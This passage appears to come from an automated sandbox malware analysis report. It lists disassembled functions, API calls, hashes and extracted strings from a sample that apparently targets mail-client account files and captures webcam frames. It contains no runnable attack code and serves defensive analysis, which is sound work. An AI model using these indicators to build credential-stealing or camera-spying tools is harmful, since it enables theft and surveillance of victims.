                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: freeaddrinfo
                                                                                                                                                                • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()
                                                                                                                                                                • API String ID: 2731292433-2053607270
                                                                                                                                                                • Opcode ID: 70ff28f7ee544cd2ecc7b9def5bbda76d1e59e4fef1ab230dbab342f7d9387b2
                                                                                                                                                                • Instruction ID: 622f2400eda6671ac0f1492e4bb81137bafb9aef2658f69921d6a46297a2707e
                                                                                                                                                                • Opcode Fuzzy Hash: 70ff28f7ee544cd2ecc7b9def5bbda76d1e59e4fef1ab230dbab342f7d9387b2
                                                                                                                                                                • Instruction Fuzzy Hash: 09D155B5E007198BDB18CF98D480A9DFFB1FF49314F25826ED8196B352DB71A981CB90
                                                                                                                                                                Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                • _free.LIBCMT ref: 10005B55
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                Function 6FEA5230 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(6FE7AFD9,?,00000004,000000FF,6FE80A00,FFFFFFFF,?,?,6FE7AFD9,6FED3BF4), ref: 6FEA52BB
                                                                                                                                                                • GetLastError.KERNEL32(?,6FE7AFD9,6FED3BF4), ref: 6FEA52C2
                                                                                                                                                                Strings
                                                                                                                                                                • To, xrefs: 6FEA52FE
                                                                                                                                                                • \o(, xrefs: 6FEA5321
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FEA5313
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastWait
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$To$\o(
                                                                                                                                                                • API String ID: 1574541344-1974936466
                                                                                                                                                                • Opcode ID: d2da478a8bbab971150e093fd422429de2cd7c6a4bde83bbdef7d2e0bbe36edd
                                                                                                                                                                • Instruction ID: 75ca361abff078e90f4358e911bdbd1dc0b5120739b45ffb9d625e22eb59bdac
                                                                                                                                                                • Opcode Fuzzy Hash: d2da478a8bbab971150e093fd422429de2cd7c6a4bde83bbdef7d2e0bbe36edd
                                                                                                                                                                • Instruction Fuzzy Hash: 332182305443048BDB148A688854BA97BB1AF8633CF740B5EE9659F3D8E637684287A1
                                                                                                                                                                Function 6FE9B681 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C:\Users\user\task.exe
                                                                                                                                                                • API String ID: 0-325489873
                                                                                                                                                                • Opcode ID: ac9705b1bc9c7477b7e28e5d77e674fecc20898a348b98d9dbe650d232672c90
                                                                                                                                                                • Instruction ID: 3eee9cbe02167be982fe9de5628e8f1edd3778168b424cdb25f1d537b8f01026
                                                                                                                                                                • Opcode Fuzzy Hash: ac9705b1bc9c7477b7e28e5d77e674fecc20898a348b98d9dbe650d232672c90
                                                                                                                                                                • Instruction Fuzzy Hash: 09214F71A05209AFD7109F759D9095B7FAEEF4236C7204B29E924DB2A0D730FE518770
                                                                                                                                                                Function 0006A213 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0006A2EA), ref: 0006A249
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0006A2EA), ref: 0006A258
                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,0006A2EA), ref: 0006A285
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0006A2EA), ref: 0006A28C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                • String ID: !
                                                                                                                                                                • API String ID: 1958988193-891483820
                                                                                                                                                                • Opcode ID: 18b04de977e59bd824baf31df3c32e941770c56c8e13e8f69ae67434af13accd
                                                                                                                                                                • Instruction ID: 0046bc7dae06502ae4c423d6f6743d2dd42f5840e113fc787f1a5cdc922f9f3d
                                                                                                                                                                • Opcode Fuzzy Hash: 18b04de977e59bd824baf31df3c32e941770c56c8e13e8f69ae67434af13accd
                                                                                                                                                                • Instruction Fuzzy Hash: 481199303856416AF6A0B7689CE9A6F3BDBAB23310F00051DF64253A92C62F5848CB37
                                                                                                                                                                Function 6FE979F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8C5F75A1,00000000,?,00000000,6FEA5C90,000000FF,?,6FE9798D,?,?,6FE97961,?), ref: 6FE97A28
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FE97A3A
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6FEA5C90,000000FF,?,6FE9798D,?,?,6FE97961,?), ref: 6FE97A5C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                • Opcode ID: a1abdd362a32b26ec359d22432869da0926c12af92692529c57b4ce29f351241
                                                                                                                                                                • Instruction ID: 6635c5c119581686ccee3aa35a586591564f1fbae1613c0a72ee723fcb156765
                                                                                                                                                                • Opcode Fuzzy Hash: a1abdd362a32b26ec359d22432869da0926c12af92692529c57b4ce29f351241
                                                                                                                                                                • Instruction Fuzzy Hash: 99016731914A55EFDB018F94CC05FAEBFB9FB47725F10452AE821A2680EB759914CA50
                                                                                                                                                                Function 0006D0AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0006D0B7
                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0006D0F6
                                                                                                                                                                  • Part of subcall function 00092FE3: _Yarn.LIBCPMT ref: 00093002
                                                                                                                                                                  • Part of subcall function 00092FE3: _Yarn.LIBCPMT ref: 00093026
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0006D10E
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0006D11C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                • API String ID: 3706160523-1405518554
                                                                                                                                                                • Opcode ID: 144766a78c653dbf6253b9e866e723b215494392d99ece3983ead44137bfcada
                                                                                                                                                                • Instruction ID: 5f019d3693c4adf4e6a851b4421edb41a8876ebe76c285fe8e685e8b56b4194b
                                                                                                                                                                • Opcode Fuzzy Hash: 144766a78c653dbf6253b9e866e723b215494392d99ece3983ead44137bfcada
                                                                                                                                                                • Instruction Fuzzy Hash: 67F06235504748ABC724FF60E857EEEB3B59F24790F50452DF516064D3EF70AA48C691
                                                                                                                                                                Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                Function 000651FB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00065239
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00064F9B,00000001), ref: 00065245
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00064F9B,00000001), ref: 00065250
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00064F9B,00000001), ref: 00065259
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                • String ID: KeepAlive | Disabled
                                                                                                                                                                • API String ID: 2993684571-305739064
                                                                                                                                                                • Opcode ID: 4e7a002c0b4f7dd2da6a355d41d5f2c1e272f748470a2f5f37812fb32fcd3b2b
                                                                                                                                                                • Instruction ID: ba96e4aab6fcab92d21fa2ba8a36178749187b69eba088d4c3238ac270dd9f95
                                                                                                                                                                • Opcode Fuzzy Hash: 4e7a002c0b4f7dd2da6a355d41d5f2c1e272f748470a2f5f37812fb32fcd3b2b
                                                                                                                                                                • Instruction Fuzzy Hash: CBF0B171908B107FFB1137749D0A9EA7F99EB13711F04061DF94141663D56B9410D751
                                                                                                                                                                Function 00079087 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 000790B9
                                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 000790C7
                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 000790CE
                                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 000790D7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                • String ID: Alarm triggered
                                                                                                                                                                • API String ID: 614609389-2816303416
                                                                                                                                                                • Opcode ID: a28a3b97a9c30c2cb8c6f51106b9332063d09b82c2cfb237bd37ff3bfbd0c278
                                                                                                                                                                • Instruction ID: 8d956272c3ade76ef6392bb0fe2bc3bcfc0cf493d49c4b21aa567304f7c9f33f
                                                                                                                                                                • Opcode Fuzzy Hash: a28a3b97a9c30c2cb8c6f51106b9332063d09b82c2cfb237bd37ff3bfbd0c278
                                                                                                                                                                • Instruction Fuzzy Hash: 32E01A22B4452037792033BA6C4FDAF3D39CBC2B62B410259FA0956192DE5A0805C6F3
                                                                                                                                                                Function 6FE7E420 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32), ref: 6FE7E428
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6FE7E438
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID: o$SetThreadDescription$kernel32
                                                                                                                                                                • API String ID: 1646373207-2496278970
                                                                                                                                                                • Opcode ID: 07523ed74b888bfc6e5b571108865bd7d109a8cf1b75dd468a5215f7a4cc08ac
                                                                                                                                                                • Instruction ID: 68c81e12b8ba1c5139f6e9e6d7ca1489cf1f3a0d7e0b062fabb32f02a6742da3
                                                                                                                                                                • Opcode Fuzzy Hash: 07523ed74b888bfc6e5b571108865bd7d109a8cf1b75dd468a5215f7a4cc08ac
                                                                                                                                                                • Instruction Fuzzy Hash: 70D0123024CF1A9F5A6C4B27580A7653EE99B43665320843EE405C6B00ED229420C655
                                                                                                                                                                Function 000644AE Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000000,000C8980), ref: 00064603
                                                                                                                                                                  • Part of subcall function 00064746: __EH_prolog.LIBCMT ref: 0006474B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: H_prologSleep
                                                                                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                                • API String ID: 3469354165-3547787478
                                                                                                                                                                • Opcode ID: 2d84e621822ed646bc528c549a3b6f80cd9684f02a2ca2e1b9b55b3338cf9c5b
                                                                                                                                                                • Instruction ID: 6cc683a202d1161f99f28aec3580c4c8c9e2b05bd740b692f6458b2cc1de353c
                                                                                                                                                                • Opcode Fuzzy Hash: 2d84e621822ed646bc528c549a3b6f80cd9684f02a2ca2e1b9b55b3338cf9c5b
                                                                                                                                                                • Instruction Fuzzy Hash: 3851D471B04605ABCA04BB74DC56AEE3B97AB95340F004129F80A8B6D7EF788E05C793
                                                                                                                                                                Function 02593DB1 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: f95b41f8153aaa2a92b9860d20ee9d5a4fc205804aed915451db1dae2d4fb6a4
                                                                                                                                                                • Instruction ID: 1806fad66937aea55250f4944130a048f8876a67e6573f0ba0afd0f842b9e94b
                                                                                                                                                                • Opcode Fuzzy Hash: f95b41f8153aaa2a92b9860d20ee9d5a4fc205804aed915451db1dae2d4fb6a4
                                                                                                                                                                • Instruction Fuzzy Hash: 2B519071A00605EFDF24DF69C841B6A7BF9FF48724F1446A9E809D7250EB35E941CB88
                                                                                                                                                                Function 02590316 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
